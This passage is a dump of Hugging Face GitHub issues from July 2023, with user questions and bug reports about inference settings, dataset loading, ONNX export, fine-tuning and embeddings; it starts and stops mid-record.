max_token_len.\r\n\r\nThere are several strategies for handling long documents, and the efficacy of each is data dependent:\r\n* Break the document up at max_token_length, possibly avoiding breaking word boundaries.\r\n* Optionally using a sliding window.\r\n* Keeping all the windows, or the first k-windows, or something fancier like finding the most \"interesting\" windows with respect to the overall corpus.\r\n\r\nThen after embedding each window, different classification strategies are possible:\r\n* maxpool then predict\r\n* average then predict\r\n* predict then average\r\n\r\nIt would be great if these could approaches could be hyperparameters for validation + test.\r\n\r\nFor train, it might be easiest to insist the training max_token_len is in bounds, alternately the above strategies could be used too.\r\n\r\nRelated:\r\nhttps://github.com/UKPLab/sentence-transformers/issues/1673\r\nhttps://github.com/UKPLab/sentence-transformers/issues/1333\r\nhttps://github.com/UKPLab/sentence-transformers/issues/1166", "url": "https://github.com/huggingface/setfit/issues/398", "state": "open", "labels": [], "created_at": "2023-07-21T11:53:13Z", "updated_at": "2023-07-21T11:53:13Z", "user": "turian" }, { "repo": "huggingface/text-generation-inference", "number": 672, "title": "What is optimal max batch size max sequence length (max_total_tokens) for running llama 2 70b chat on 4 A100 80GB?", "body": "This is what i have in my current config \r\nvalidation_workers: 2, max_total_tokens: 4096, waiting_served_ratio: 1.2, max_batch_prefill_tokens: 4096, max_batch_total_tokens: None, max_waiting_tokens: 20\r\n\r\nWhat do you recommend I should use to get the most out of inference for this setup? ", "url": "https://github.com/huggingface/text-generation-inference/issues/672", "state": "closed", "labels": [], "created_at": "2023-07-21T11:17:49Z", "updated_at": "2023-07-21T12:45:31Z", "user": "yakotoka" }, { "repo": "huggingface/datasets", "number": 6057, "title": "Why is the speed difference of gen example so big?", "body": "```python\r\ndef _generate_examples(self, metadata_path, images_dir, conditioning_images_dir):\r\n with open(metadata_path, 'r') as file:\r\n metadata = json.load(file)\r\n\r\n for idx, item in enumerate(metadata):\r\n image_path = item.get('image_path')\r\n text_content = item.get('text_content')\r\n image_data = open(image_path, \"rb\").read()\r\n yield idx, {\r\n \"text\": text_content,\r\n \"image\": {\r\n \"path\": image_path,\r\n \"bytes\": image_data,\r\n },\r\n \"conditioning_image\": {\r\n \"path\": image_path,\r\n \"bytes\": image_data,\r\n },\r\n }\r\n```\r\nHello, \r\n\r\nI use the above function to deal with my local data set, but I am very surprised that the speed at which I generate example is very different. When I start a training task, **sometimes 1000examples/s, sometimes only 10examples/s.**\r\n\r\n![image](https://github.com/huggingface/datasets/assets/46072190/cdc17661-8267-4fd8-b30c-b74d505efd9b)\r\n\r\nI'm not saying that speed is changing all the time. I mean, the reading speed is different in different training, which will cause me to start training over and over again until the speed of this generation of examples is normal.\r\n", "url": "https://github.com/huggingface/datasets/issues/6057", "state": "closed", "labels": [], "created_at": "2023-07-21T03:34:49Z", "updated_at": "2023-10-04T18:06:16Z", "comments": 1, "user": "pixeli99" }, { "repo": "huggingface/transformers.js", "number": 203, "title": "how to do embeddings?", "body": "I want to create an AI assistant for my personal website using Node.js. While I can easily create it using OpenAI embeddings, their API costs are prohibitively expensive. Therefore, I am looking for an alternative method and wondering how I can perform embeddings using a CSV file. Can you advise me on how to do this?\r\n\r\n\r\n```\r\n\r\nasync function getEmbeddings(tokens) {\r\n console.log(\"start getEmbeddings\");\r\n\r\n let response;\r\n try {\r\n console.log(\"initiating openai api call\");\r\n response = await openai.createEmbedding({\r\n model: \"text-embedding-ada-002\",\r\n input: tokens,\r\n });\r\n } catch (e) {\r\n console.error(\"Error calling OpenAI API getEmbeddings:\", e?.response?.data);\r\n throw new Error(\"Error calling OpenAI API getEmbeddings\");\r\n }\r\n\r\n return response.data.data;\r\n}\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/203", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-21T02:41:40Z", "updated_at": "2024-06-26T14:09:51Z", "user": "putuoka" }, { "repo": "huggingface/chat-ui", "number": 361, "title": "Configuration for Llama 2", "body": "I am trying to self host Llama 2 with https://github.com/huggingface/text-generation-inference and https://github.com/huggingface/chat-ui . If I give configuration for chat-ui like this:\r\n\r\n```\r\n {\r\n \"name\": \"llama2-7b-chat\",\r\n \"datasetName\": \"llama2-7b-chat\",\r\n \"description\": \"A good alternative to ChatGPT\",\r\n \"endpoints\": [{\"url\": \"http://127.0.0.1:8081/generate_stream\"}],\r\n \"userMessageToken\": \"<|prompter|>\",\r\n \"assistantMessageToken\": \"<|assistant|>\",\r\n \"messageEndToken\": \"\",\r\n \"preprompt\": \"Below are a series of dialogues between various people and an AI assistant. The AI tries to be helpful, polite, honest, sophisticated, emotionally aware, and humble-but-knowledgeable. The assistant is happy to help with almost anything, and will do its best to understand exactly what is needed. It also tries to avoid giving false or misleading information, and it caveats when it isn't entirely sure about the right answer. That said, the assistant is practical and really does its best, and doesn't let caution get too much in the way of being useful.\\n-----\\n\",\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"parameters\": {\r\n \"temperature\": 0.8,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.8,\r\n \"top_k\": 10,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024\r\n }\r\n }\r\n```\r\n\r\nIt will not return good response like https://huggingface.co/chat. \r\n\r\n![chat-ui-with-llama2-7b](https://github.com/huggingface/chat-ui/assets/661860/7afd7d99-2737-45fb-96d3-b4adfcc6e2d5)\r\n\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/361", "state": "closed", "labels": [ "support", "models" ], "created_at": "2023-07-20T14:04:29Z", "updated_at": "2023-08-22T13:54:46Z", "comments": 3, "user": "aisensiy" }, { "repo": "huggingface/text-generation-inference", "number": 658, "title": "How to use AutoGPTQ model in tgi", "body": "\r\n![image](https://github.com/huggingface/text-generation-inference/assets/76865636/0d752006-a387-4b6d-99a2-d17d58e27549)\r\n\r\ncommand\uff1a\r\n\r\nexport GPTQ_BITS=4\r\nexport GPTQ_GROUPSIZE=128\r\n\r\ntext-generation-launcher --model-id Ziya-LLaMA-13B_4bit --disable-custom-kernels --port 6006 --revision gptq-4bit-128g-actorder_True --quantize gptq\r\n\r\nresult:\r\n\r\nTraceback (most recent call last):\r\n\r\n File \"/root/miniconda3/envs/text-generation-inference/bin/text-generation-server\", line 8, in \r\n sys.exit(app())\r\n\r\n File \"/root/autodl-tmp/text-generation-inference-main/server/text_generation_server/cli.py\", line 78, in serve\r\n server.serve(\r\n\r\n File \"/root/autodl-tmp/text-generation-inference-main/server/text_generation_server/server.py\", line 169, in serve\r\n asyncio.run(\r\n\r\n File \"/root/miniconda3/envs/text-generation-inference/lib/python3.9/asyncio/runners.py\", line 44, in run\r\n return loop.run_until_complete(main)\r\n\r\n File \"/root/miniconda3/envs/text-generation-inference/lib/python3.9/asyncio/base_events.py\", line 647, in run_until_complete\r\n return future.result()\r\n\r\n File \"/root/autodl-tmp/text-generation-inference-main/server/text_generation_server/server.py\", line 136, in serve_inner\r\n model = get_model(\r\n\r\n File \"/root/autodl-tmp/text-generation-inference-main/server/text_generation_server/models/__init__.py\", line 195, in get_model\r\n return CausalLM(\r\n\r\n File \"/root/autodl-tmp/text-generation-inference-main/server/text_generation_server/models/causal_lm.py\", line 477, in __init__\r\n model = AutoModelForCausalLM.from_pretrained(\r\n\r\n File \"/root/miniconda3/envs/text-generation-inference/lib/python3.9/site-packages/transformers/models/auto/auto_factory.py\", line 467, in from_pretrained\r\n return model_class.from_pretrained(\r\n\r\n File \"/root/miniconda3/envs/text-generation-inference/lib/python3.9/site-packages/transformers/modeling_utils.py\", line 2387, in from_pretrained\r\n raise EnvironmentError(\r\n\r\nOSError: Error no file named pytorch_model.bin, tf_model.h5, model.ckpt.index or flax_model.msgpack found in directory Ziya-LLaMA-13B_4bit.\r\n rank=0\r\n2023-07-20T08:34:02.453608Z ERROR text_generation_launcher: Shard 0 failed to start\r\n2023-07-20T08:34:02.453654Z INFO text_generation_launcher: Shutting down shards", "url": "https://github.com/huggingface/text-generation-inference/issues/658", "state": "closed", "labels": [], "created_at": "2023-07-20T08:42:57Z", "updated_at": "2023-07-31T23:50:55Z", "user": "Minami-su" }, { "repo": "huggingface/chat-ui", "number": 358, "title": "Broken encoding for Korean and possibly other languages", "body": "I was testing the llama2 and noticed there are some encoding errors (Ignore that the output is total nonsense):\r\n\"image\"\r\nI though It could be because of weird mid-unicode tokenization but I also noticed this on a custom demo using huggingchat ui:\r\n\r\nIt renders correctly & strangely enough breaks and unbreaks randomly.\r\n\r\nhttps://github.com/huggingface/chat-ui/assets/15624271/7b7e97cb-876d-47cc-b89d-aabebb9197cf\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/358", "state": "closed", "labels": [ "question", "models" ], "created_at": "2023-07-20T05:00:03Z", "updated_at": "2023-09-11T09:34:12Z", "user": "cceyda" }, { "repo": "huggingface/diffusers", "number": 4160, "title": "How to use diffusers force zeros?", "body": "it seems that it only has effect if its used on instance of diffusers class before model is loaded,\r\nbut i only get instance when i call from_pretrained or from_single_file\r\n", "url": "https://github.com/huggingface/diffusers/issues/4160", "state": "closed", "labels": [ "stale", "SD.Next" ], "created_at": "2023-07-19T22:36:38Z", "updated_at": "2023-09-01T13:09:28Z", "user": "patrickvonplaten" }, { "repo": "huggingface/transformers.js", "number": 200, "title": "[Question] Translation models", "body": "\r\n@xenova is there a model that do the text translation that have lighter weight i mean with minimum size?", "url": "https://github.com/huggingface/transformers.js/issues/200", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-19T22:07:37Z", "updated_at": "2023-07-27T00:17:24Z", "user": "jedLahrim" }, { "repo": "huggingface/dataset-viewer", "number": 1532, "title": "provide one \"partial\" field per entry in aggregated responses", "body": "For example, https://datasets-server.huggingface.co/size?dataset=c4 only provides a global `partial: true` field and the response does not explicit that the \"train\" split is partial, while the \"test\" one is complete.\r\n\r\nEvery entry in `configs` and `splits` should also include its own `partial` field, to be able to show this information in the viewer (selects)\r\n\r\n- currently:\r\n \"Capture\r\n- ideally, something like:\r\n \"Capture\r\n\r\nEndpoints where we want these extra fields:\r\n\r\n- /info, dataset-level\r\n- /size, dataset-level\r\n- /size, config-level\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/1532", "state": "open", "labels": [ "question", "feature request", "P2" ], "created_at": "2023-07-19T20:01:58Z", "updated_at": "2024-05-16T09:36:20Z", "user": "severo" }, { "repo": "huggingface/datasets", "number": 6053, "title": "Change package name from \"datasets\" to something less generic", "body": "### Feature request\r\n\r\nI'm repeatedly finding myself in situations where I want to have a package called `datasets.py` or `evaluate.py` in my code and can't because those names are being taken up by Huggingface packages. While I can understand how (even from the user's perspective) it's aesthetically pleasing to have nice terse library names, ultimately a library hogging simple names like this is something I find short-sighted, impractical and at my most irritable, frankly rude.\r\n\r\nMy preference would be a pattern like what you get with all the other big libraries like numpy or pandas:\r\n\r\n```\r\nimport huggingface as hf\r\n# hf.transformers, hf.datasets, hf.evaluate\r\n```\r\n\r\nor things like\r\n\r\n```\r\nimport huggingface.transformers as tf\r\n# tf.load_model(), etc\r\n```\r\n\r\nIf this isn't possible for some technical reason, at least just call the packages something like `hf_transformers` and so on.\r\n\r\nI realize this is a very big change that's probably been discussed internally already, but I'm making this issue and sister issues on each huggingface project just to start the conversation and begin tracking community feeling on the matter, since I suspect I'm not the only one who feels like this.\r\n\r\nSorry if this has been requested already on this issue tracker, I couldn't find anything looking for terms like \"package name\".\r\n\r\nSister issues:\r\n- [transformers](https://github.com/huggingface/transformers/issues/24934)\r\n- **datasets**\r\n- [evaluate](https://github.com/huggingface/evaluate/issues/476)\r\n\r\n### Motivation\r\n\r\nNot taking up package names the user is likely to want to use.\r\n\r\n### Your contribution\r\n\r\nNo - more a matter of internal discussion among core library authors.", "url": "https://github.com/huggingface/datasets/issues/6053", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-07-19T19:53:28Z", "updated_at": "2024-11-20T21:22:36Z", "comments": 2, "user": "jack-jjm" }, { "repo": "huggingface/trl", "number": 542, "title": "Supervised Finetuning - How to mask loss for prompts ", "body": "How can I mask the loss in supervised fine-tuning for prompts similar to how it is done in the LLAMA-2 paper? \r\n\r\nSpecifically, I have a dataset of prompts and ideal answers. When fine-tuning my model with a `SFTTrainer` using a `ConstantLengthDataset` (similar to the StackExchange example), how can I ensure that prompts are not considered in the loss? ", "url": "https://github.com/huggingface/trl/issues/542", "state": "closed", "labels": [], "created_at": "2023-07-19T14:55:17Z", "updated_at": "2023-08-16T15:02:50Z", "user": "jvhoffbauer" }, { "repo": "huggingface/chat-ui", "number": 351, "title": "Starchat-beta doesn't stop generating text properly", "body": "Hi, I am deploying starchat-beta and chat-ui locally, it is strange that I found the chat will generate some useful text in the beginning, then it will not stop, then generates some unrelated text, like below\r\n![Screenshot from 2023-07-19 22-23-00](https://github.com/huggingface/chat-ui/assets/7758217/a41395b1-fbe1-4632-b162-35d656ba30a0)\r\n\r\nIs it related with .env.local configuration?\r\n![Screenshot from 2023-07-19 22-25-01](https://github.com/huggingface/chat-ui/assets/7758217/bda3a91e-e5ce-4b7e-8b6c-e63d129dce37)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/351", "state": "closed", "labels": [ "support", "models" ], "created_at": "2023-07-19T14:32:59Z", "updated_at": "2023-07-20T06:29:09Z", "comments": 3, "user": "XiaPZ" }, { "repo": "huggingface/trl", "number": 534, "title": "How to load a trained model to continue trianing?", "body": "Dear TRL team,\r\n\r\nI face a challenge that I can't finish the training in one go. Thus, I need to load the model that is trained half-way and continue the training process. Could you please guide me how to load the half-way trained model and continue the trianing process?\r\n\r\nBest", "url": "https://github.com/huggingface/trl/issues/534", "state": "closed", "labels": [], "created_at": "2023-07-19T04:36:15Z", "updated_at": "2023-08-26T15:04:58Z", "user": "zyzisastudyreallyhardguy" }, { "repo": "huggingface/diffusers", "number": 4150, "title": "How to train text-to-image model based on SDXL?", "body": "Can I use the train_text_to_image.py code directly?", "url": "https://github.com/huggingface/diffusers/issues/4150", "state": "closed", "labels": [], "created_at": "2023-07-19T02:59:00Z", "updated_at": "2023-07-21T15:23:30Z", "user": "EnzoWuu" }, { "repo": "huggingface/text-generation-inference", "number": 636, "title": "How to config vllm gpu_memory_utilization?", "body": "Hi team, I am trying using codegen2.5 7b model on tgi with A100 40GB and it gives me out of memory error because of vllm. I wonder if there is any way I can config gpu_memory_utilization in the code such that the vllm does not reserve too memory beforehand ", "url": "https://github.com/huggingface/text-generation-inference/issues/636", "state": "closed", "labels": [], "created_at": "2023-07-18T20:19:28Z", "updated_at": "2024-07-04T07:32:01Z", "user": "zch-cc" }, { "repo": "huggingface/optimum", "number": 1202, "title": "What is the process for contributing a new backend?", "body": "### Feature request\r\n\r\nIn terms of contributing a new backend/optimizer to Optimum as an optional extension, what is the process? \r\n\r\nI have been working on an Optimum integration with [DeepSparse](https://github.com/neuralmagic/deepsparse), Neural Magic's inference runtime for sparse execution on CPUs. If it is an open-source contribution that we've already started and will continue to support, is it mostly just a function of creating a `huggingface/optimum-deepsparse` repo to push up the state?\r\n\r\n### Motivation\r\n\r\nWe already have a project hosted by Neural Magic: https://github.com/neuralmagic/optimum-deepsparse\r\n\r\nIt is already functional for a few simple tasks (image/text/audio/token classification, question answering, masked lm) and is generally going for usability-parity with ORTModel since DeepSparse also takes in ONNX models directly for compilation. \r\nDeepSparse supports x86 and ARM CPUs, and is able to see performance benefits from unstructured sparsity on all platforms. \r\nHaving optimum-deepsparse be officially installable through the Optimum base as an extension i.e. `pip install optimum[deepsparse]` would be important for writing clean flows for people to sparsify their models and get the maximal inference performance out of their CPUs.\r\n\r\n### Your contribution\r\n\r\nhttps://github.com/neuralmagic/optimum-deepsparse\r\nI'm happy to submit a PR to add it to Optimum's setup.py, write documentation to detail how to use it, and anything else required to make an official request. Thank you!", "url": "https://github.com/huggingface/optimum/issues/1202", "state": "closed", "labels": [ "question", "Stale" ], "created_at": "2023-07-18T18:07:14Z", "updated_at": "2025-05-13T02:14:09Z", "user": "mgoin" }, { "repo": "huggingface/accelerate", "number": 1743, "title": "what is the possible reason for accelerate running on cuda 12.2 8xA100 with error accelerate multiprocessing.api:failed (exitcode: -9)", "body": "### System Info\n\n```Shell\nubuntu 22.04\r\ngpu A100 80G\r\ncuda version 12.2\r\naccelerate version 0.21.0\n```\n\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nrunning the demo script from diffusers [train_text_to_image.py](https://github.com/huggingface/diffusers/tree/main/examples/text_to_image) for 100k iterations with batch size 8 each gpu, 8 A100 gpus in total\n\n### Expected behavior\n\nsuccessful training without any problem", "url": "https://github.com/huggingface/accelerate/issues/1743", "state": "closed", "labels": [], "created_at": "2023-07-18T13:33:35Z", "updated_at": "2023-08-15T09:18:05Z", "user": "garychan22" }, { "repo": "huggingface/datasets", "number": 6048, "title": "when i use datasets.load_dataset, i encounter the http connect error!", "body": "### Describe the bug\n\n`common_voice_test = load_dataset(\"audiofolder\", data_dir=\"./dataset/\",cache_dir=\"./cache\",split=datasets.Split.TEST)`\r\nwhen i run the code above, i got the error as below:\r\n--------------------------------------------\r\nConnectionError: Couldn't reach https://raw.githubusercontent.com/huggingface/datasets/2.3.2/datasets/audiofolder/audiofolder.py (ConnectionError(MaxRetryError(\"HTTPSConnectionPool(host='raw.githubusercontent.com', port=443): Max retries exceeded with url: /huggingface/datasets/2.3.2/datasets/audiofolder/audiofolder.py (Caused by NewConnectionError(': Failed to establish a new connection: [Errno 101] Network is unreachable'))\")))\r\n\r\n\r\n--------------------------------------------------\r\nMy all data is on local machine, why does it need to connect the internet? how can i fix it, because my machine cannot connect the internet.\n\n### Steps to reproduce the bug\n\n1\n\n### Expected behavior\n\nno error when i use the load_dataset func\n\n### Environment info\n\npython=3.8.15", "url": "https://github.com/huggingface/datasets/issues/6048", "state": "closed", "labels": [], "created_at": "2023-07-18T10:16:34Z", "updated_at": "2023-07-18T16:18:39Z", "comments": 1, "user": "yangy1992" }, { "repo": "huggingface/safetensors", "number": 299, "title": "Any plan to support Nvidia GPUDirect Storage?", "body": "### Feature request\n\nNvidia GPUDirect Storage has better performance to load model from NVMe disk or supported distributed storage. It will do the real `zero copy`.\n\n### Motivation\n\nIt will get better performance with Nvidia GDS.\n\n### Your contribution\n\nNot sure.", "url": "https://github.com/huggingface/safetensors/issues/299", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-07-17T06:36:51Z", "updated_at": "2025-11-22T05:21:50Z", "comments": 9, "user": "carmark" }, { "repo": "huggingface/optimum", "number": 1191, "title": "ONNX Generation - Support for Donut", "body": "### Feature request\r\n\r\nI have been trying to convert my custom Donut model to ONNX by using this specific command:\r\n!python3 -m optimum.exporters.onnx --model={custom_model_id} --task=vision2seq-lm ./models/onnx --optimize O4 --atol 1e-2 --opset=13\r\n\r\nThe following exception occurs at the end of the process, by which I understand the vision-encoder-decoder is not supported yet. Are there any plans to integrate vision-encoder-decoder for optimum.exporters.onnx soon?\r\n\r\nError observed:\r\n\r\nFile \"/usr/local/lib/python3.10/dist-packages/optimum/onnxruntime/utils.py\", line 162, in check_optimization_supported_model\r\n raise NotImplementedError(\r\nNotImplementedError: ONNX Runtime doesn't support the graph optimization of vision-encoder-decoder yet. Only ['albert', 'bart', 'bert', 'big_bird', 'blenderbot', 'bloom', 'camembert', 'codegen', 'deberta', 'deberta-v2', 'distilbert', 'electra', 'gpt2', 'gpt_neo', 'gpt_neox', 'gptj', 'longt5', 'llama', 'marian', 'mbart', 'mt5', 'm2m_100', 'nystromformer', 'pegasus', 'roberta', 't5', 'vit', 'whisper', 'xlm-roberta'] are supported. If you want to support vision-encoder-decoder please propose a PR or open up an issue in ONNX Runtime: https://github.com/microsoft/onnxruntime.\r\n\r\n\r\n\r\n### Motivation\r\n\r\nUse optimum.exporters.onnx to convert custom Donut model to ONNX to improve inference performance.\r\n\r\n### Your contribution\r\n\r\nStill looking at the links and getting familiar how to proceed with change. will be grateful if someone can point me to resources where I can get started. thanks.", "url": "https://github.com/huggingface/optimum/issues/1191", "state": "closed", "labels": [ "feature-request", "onnx" ], "created_at": "2023-07-16T13:38:38Z", "updated_at": "2024-10-15T16:14:33Z", "comments": 3, "user": "ghost" }, { "repo": "huggingface/transformers.js", "number": 194, "title": "[Question] Transformers.js bundle size", "body": "I'm building a small project that runs `transformers.js` in a `Worker` to do client side embedding.\r\nI noticed that including `import { pipeline } from '@xenova/transformers';` immediately increases my bundle size to over **3MB**. \r\n\r\n![image](https://github.com/xenova/transformers.js/assets/3016806/f4a0f8bb-9d6f-4f92-a39c-ee3be4cc4198)\r\nCreated using [webpack-bundle-analyzer](https://www.npmjs.com/package/webpack-bundle-analyzer)\r\n\r\nOptimizing for this It's probably a large effort, but I was wondering if you have any ideas on how this could be optimized.", "url": "https://github.com/huggingface/transformers.js/issues/194", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-16T08:06:28Z", "updated_at": "2023-07-16T16:28:52Z", "user": "lizozom" }, { "repo": "huggingface/trl", "number": 520, "title": "how to change the cache directory when using AutoModelForCausalLMWithValueHead.from_pretrained()", "body": "I have tried several methods, but it still download to my home directory", "url": "https://github.com/huggingface/trl/issues/520", "state": "closed", "labels": [], "created_at": "2023-07-16T04:21:45Z", "updated_at": "2023-07-17T08:11:02Z", "user": "zyzisastudyreallyhardguy" }, { "repo": "huggingface/peft", "number": 711, "title": "How to change the location of soft tokens in prompt tuning", "body": "### Feature request\n\nIn fact, when prompt tuning, we will not always add it to the front, it may be in the middle. So I think it's important for us to change the location of soft tokens.\n\n### Motivation\n\nIn fact, when prompt tuning, we will not always add it to the front, it may be in the middle. So I think it's important for us to change the location of soft tokens.\n\n### Your contribution\n\nno", "url": "https://github.com/huggingface/peft/issues/711", "state": "closed", "labels": [], "created_at": "2023-07-15T13:57:52Z", "updated_at": "2024-04-09T06:39:55Z", "user": "XueTianci" }, { "repo": "huggingface/datasets", "number": 6038, "title": " File \"/home/zhizhou/anaconda3/envs/pytorch/lib/python3.10/site-packages/datasets/builder.py\", line 992, in _download_and_prepare if str(split_generator.split_info.name).lower() == \"all\": AttributeError: 'str' object has no attribute 'split_info'. Did you mean: 'splitlines'?", "body": "Hi, I use the code below to load local file\r\n```\r\n def _split_generators(self, dl_manager):\r\n # TODO: This method is tasked with downloading/extracting the data and defining the splits depending on the configuration\r\n # If several configurations are possible (listed in BUILDER_CONFIGS), the configuration selected by the user is in self.config.name\r\n\r\n # dl_manager is a datasets.download.DownloadManager that can be used to download and extract URLS\r\n # It can accept any type or nested list/dict and will give back the same structure with the url replaced with path to local files.\r\n # By default the archives will be extracted and a path to a cached folder where they are extracted is returned instead of the archive\r\n # urls = _URLS[self.config.name]\r\n data_dir = dl_manager.download_and_extract(_URLs)\r\n print(data_dir)\r\n return [\r\n datasets.SplitGenerator(\r\n name=datasets.Split.TRAIN,\r\n # These kwargs will be passed to _generate_examples\r\n gen_kwargs={\r\n \"filepath\": os.path.join(data_dir[\"train\"]),\r\n \"split\": \"train\",\r\n },\r\n ),\r\n datasets.SplitGenerator(\r\n name=datasets.Split.VALIDATION,\r\n # These kwargs will be passed to _generate_examples\r\n gen_kwargs={\r\n \"filepath\": os.path.join(data_dir[\"dev\"]),\r\n \"split\": \"dev\",\r\n },\r\n ),\r\n ]\r\n```\r\nand error occured\r\n```\r\n\r\nTraceback (most recent call last):\r\n File \"/home/zhizhou/data1/zhanghao/huggingface/FineTuning_Transformer/load_local_dataset.py\", line 2, in \r\n dataset = load_dataset(\"./QA_script.py\",data_files='/home/zhizhou/.cache/huggingface/datasets/conversatiom_corps/part_file.json')\r\n File \"/home/zhizhou/anaconda3/envs/pytorch/lib/python3.10/site-packages/datasets/load.py\", line 1809, in load_dataset\r\n builder_instance.download_and_prepare(\r\n File \"/home/zhizhou/anaconda3/envs/pytorch/lib/python3.10/site-packages/datasets/builder.py\", line 909, in download_and_prepare\r\n self._download_and_prepare(\r\n File \"/home/zhizhou/anaconda3/envs/pytorch/lib/python3.10/site-packages/datasets/builder.py\", line 1670, in _download_and_prepare\r\n super()._download_and_prepare(\r\n File \"/home/zhizhou/anaconda3/envs/pytorch/lib/python3.10/site-packages/datasets/builder.py\", line 992, in _download_and_prepare\r\n if str(split_generator.split_info.name).lower() == \"all\":\r\nAttributeError: 'str' object has no attribute 'split_info'. Did you mean: 'splitlines'?\r\n```\r\nCould you help me?", "url": "https://github.com/huggingface/datasets/issues/6038", "state": "closed", "labels": [], "created_at": "2023-07-15T07:58:08Z", "updated_at": "2023-07-24T11:54:15Z", "comments": 1, "user": "BaiMeiyingxue" }, { "repo": "huggingface/datasets", "number": 6033, "title": "`map` function doesn't fully utilize `input_columns`.", "body": "### Describe the bug\r\n\r\nI wanted to select only some columns of data.\r\nAnd I thought that's why the argument `input_columns` exists.\r\nWhat I expected is like this:\r\nIf there are [\"a\", \"b\", \"c\", \"d\"] columns, and if I set `input_columns=[\"a\", \"d\"]`, the data will have only [\"a\", \"d\"] columns.\r\n\r\nBut it doesn't select columns.\r\nIt preserves existing columns.\r\nThe main cause is `update` function of `dictionary` type `transformed_batch`.\r\n\r\nhttps://github.com/huggingface/datasets/blob/682d21e94ab1e64c11b583de39dc4c93f0101c5a/src/datasets/iterable_dataset.py#L687-L691\r\n\r\n`transformed_batch` gets all the columns by `transformed_batch = dict(batch)`.\r\nEven `function_args` selects `input_columns`, `update` preserves columns other than `input_columns`.\r\nI think it should take a new dictionary with columns in `input_columns` like this:\r\n```\r\n# transformed_batch = dict(batch)\r\n# transformed_batch.update(self.function(*function_args, **self.fn_kwargs)\r\n\r\n# This is what I think correct.\r\ntransformed_batch = self.function(*function_args, **self.fn_kwargs)\r\n```\r\n\r\nLet me know how to use `input_columns`.\r\n\r\n### Steps to reproduce the bug\r\n\r\nDescribed all above.\r\n\r\n### Expected behavior\r\n\r\nDescribed all above.\r\n\r\n### Environment info\r\n\r\ndatasets: 2.12\r\npython: 3.8", "url": "https://github.com/huggingface/datasets/issues/6033", "state": "closed", "labels": [], "created_at": "2023-07-14T08:49:28Z", "updated_at": "2023-07-14T09:16:04Z", "comments": 0, "user": "kwonmha" }, { "repo": "huggingface/text-generation-inference", "number": 614, "title": "How to make it? How can we extend the 'max_new_tokens' from 1512 to either 4096 or 8192?", "body": "### System Info\n\n How can we extend the 'max_new_tokens' from 1512 to either 4096 or 8192?\n\n### Information\n\n- [X] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [X] An officially supported command\n- [X] My own modifications\n\n### Reproduction\n\n'max_new_tokens' from 1512 to either 4096 or 8192\n\n### Expected behavior\n\n'max_new_tokens' from 1512 to either 4096 or 8192", "url": "https://github.com/huggingface/text-generation-inference/issues/614", "state": "closed", "labels": [], "created_at": "2023-07-14T08:46:29Z", "updated_at": "2023-07-19T06:04:32Z", "user": "DiamondYuanqi" }, { "repo": "huggingface/transformers.js", "number": 193, "title": "all-MiniLM-L6-v2 vector lengths", "body": "Hey, is there any way to programmatically set fix the vector embedding array lengths to a certain length? I was using https://huggingface.co/Xenova/all-MiniLM-L6-v2 with nodejs and every input I ran through the pipe gave a different length, and it would be nice to be able to keep it consistent.\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/193", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-13T20:31:06Z", "updated_at": "2023-07-13T22:32:03Z", "user": "unkn-wn" }, { "repo": "huggingface/chat-ui", "number": 344, "title": "404 not found error when exporting data", "body": "https://github.com/huggingface/chat-ui/blob/1eff97d9fd47d8c486480d4d9a5208437c519cbb/src/routes/admin/export/%2Bserver.ts#L16\r\n\r\nI am using the main branch and tried to export the dataset with the curl request given in the code, but the server returns 404 not found.\r\nIts behind an reverse proxy with ssl, do i need to call the localhost or should it be possible even from outside the network ?", "url": "https://github.com/huggingface/chat-ui/issues/344", "state": "closed", "labels": [ "question", "back" ], "created_at": "2023-07-13T08:40:27Z", "updated_at": "2023-11-10T09:50:22Z", "user": "flozi00" }, { "repo": "huggingface/sentence-transformers", "number": 2254, "title": "How to prepare label for the dataset that has two pairs of text, but not labels?", "body": "Hi,\r\n\r\nThank you for the great information, I have a question. My data has two column of texts, one as description of a request, the other one like an answer for that request. I want to use the Contrasiveloss to make the pairs of request and answer close and the other answer that are not related far, but I do not know how to provide the label for my positive pairs, and negative one, because the dataset function accept is a triple like this calling InputExample:\r\n\r\n(a1,b1,1) (a1,bi,0)\r\n\r\nI appreciate your help.", "url": "https://github.com/huggingface/sentence-transformers/issues/2254", "state": "open", "labels": [], "created_at": "2023-07-12T21:30:07Z", "updated_at": "2023-07-30T15:38:09Z", "user": "Yarmohamadshr" }, { "repo": "huggingface/optimum", "number": 1183, "title": "Cannot convert owlvit-base-patch32 model to ONNX and run inference", "body": "### System Info\n\n```shell\nOptimum version: 1.9.1\r\nPython version: 3.11.3\r\nOS: MacOS\n```\n\n\n### Who can help?\n\n@mich\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nWhen using the CLI command\r\n`optimum-cli export onnx --model google/owlvit-base-patch32 --task 